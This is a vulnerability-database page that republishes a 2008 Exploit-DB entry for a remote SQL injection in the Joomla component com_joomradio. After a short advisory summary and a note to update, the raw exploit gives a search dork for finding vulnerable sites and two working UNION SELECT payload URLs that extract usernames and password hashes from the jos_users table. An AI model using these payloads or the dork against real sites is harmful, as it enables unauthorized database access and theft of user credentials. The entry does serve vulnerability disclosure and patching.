header-logo
Suggest Exploit
vendor:
joomradio
by:
His0k4
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: joomradio
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component joomradio Remote SQL Injection

A remote SQL injection vulnerability exists in Joomla Component joomradio. An attacker can exploit this vulnerability to inject malicious SQL queries in the application, allowing them to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.
Source

Exploit-DB raw data:

#########################################################
#							#
#    Joomla Component joomradio Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact:     His0k4.hlm[at]gmail.com
[*] Greetz :     All friends & muslims HaCkeRs  :) 
[*] Greetz2 :    http://www.palcastle.org/cc/  

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "com_joomradio"

########################################

[*] DORK: inurl:com_joomradio

########################################

[*] P.O.C 1: /index.php?option=com_joomradio&page=show_radio&id={SQL}
[*] Example: /index.php?option=com_joomradio&page=show_radio&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--

[*] P.O.C 2: /index.php?option=com_joomradio&page=show_video&id={SQL}
[*] Example: /index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
########################################

# milw0rm.com [2008-06-03]

Navigation

Suggest Exploit

Services By CQR